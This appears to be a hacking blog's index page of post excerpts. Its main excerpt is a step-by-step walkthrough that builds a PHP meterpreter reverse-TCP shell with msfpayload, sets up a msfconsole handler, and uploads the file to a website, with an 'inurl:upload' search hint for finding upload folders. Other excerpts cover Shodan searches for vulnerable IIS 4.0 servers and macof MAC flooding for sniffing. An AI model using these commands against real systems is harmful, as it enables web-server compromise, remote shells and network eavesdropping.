1.Using msfpayload in backtrack 5r1 root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=Your-IP-Address LPORT=8080 R > connection.php 2. Connection.php is created in root. 3. Open msfconsole use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST Your-IP-Address set LPORT 8080 exploit 4. Upload the file to a website then search for it eg dvwa/hackable/uploads [ ] connection.php 21-Jan-2011 11:06 1.3K 5.… Continue reading inurl:upload
Sites we like. Our daily bookmarks for your inspiration. Follow @Siteswelike. Follow. http://securityhorror.blogspot.se/2012/05/ask-and-you-shall-receive-part-1.html 1991 – Can’t Beat the Real Thing. MyExploitHQ
MyExploitHQ wanted to show our support to all the countries that have viewed this notebook so far! United States United Kingdom India Germany Netherlands France Poland Brazil Canada Spain Italy Portugal Australia Singapore Sweden Algeria Mexico Egypt South Africa Indonesia Turkey Argentina Israel Nigeria Pakistan Ukraine United Arab Emirates Morocco Greece Chile Ireland Saudi… Continue reading 23 Nov 2011 – While You Were Out: Weekly World
Please take a look at this video on YouTube https://msfbt.wordpress.com/ MyExploitHQ support
ipcalc takes an IP address and netmask and calculates the resulting broadcast, network, Cisco wildcard mask, and host range. By giving a second netmask, you can design sub- and supernetworks. It is also intended to be a teaching tool and presents the results as easy-to-understand binary values. -n –nocolor Don’t display ANSI color codes. -b… Continue reading It appears you or your system administrator has been in a coma for over 5 years and you are still using IE7
Search for computers based on software, geography, operating system, IP address and more. For example, it can find servers running Apache 2.2.3 on Windows … http://www.shodanhq.com/search?q=Iis%2F4 http://www.shodanhq.com/exploits?q=iis%2F4 Microsoft IIS 4.0 .HTR Path Overflow This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against Windows… Continue reading Jan 09 09:09:12.653 [Warning] You are running Tor as root. You don’t need to, and you probably shouldn’t.
macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing) root@bt:~# macof -i tap0 OPTIONS -i interface Specify the interface to send on. -s src Specify source IP address. -d dst Specify destination IP address. -e tha Specify target hardware address. -x sport Specify TCP… Continue reading network – cisco mac flood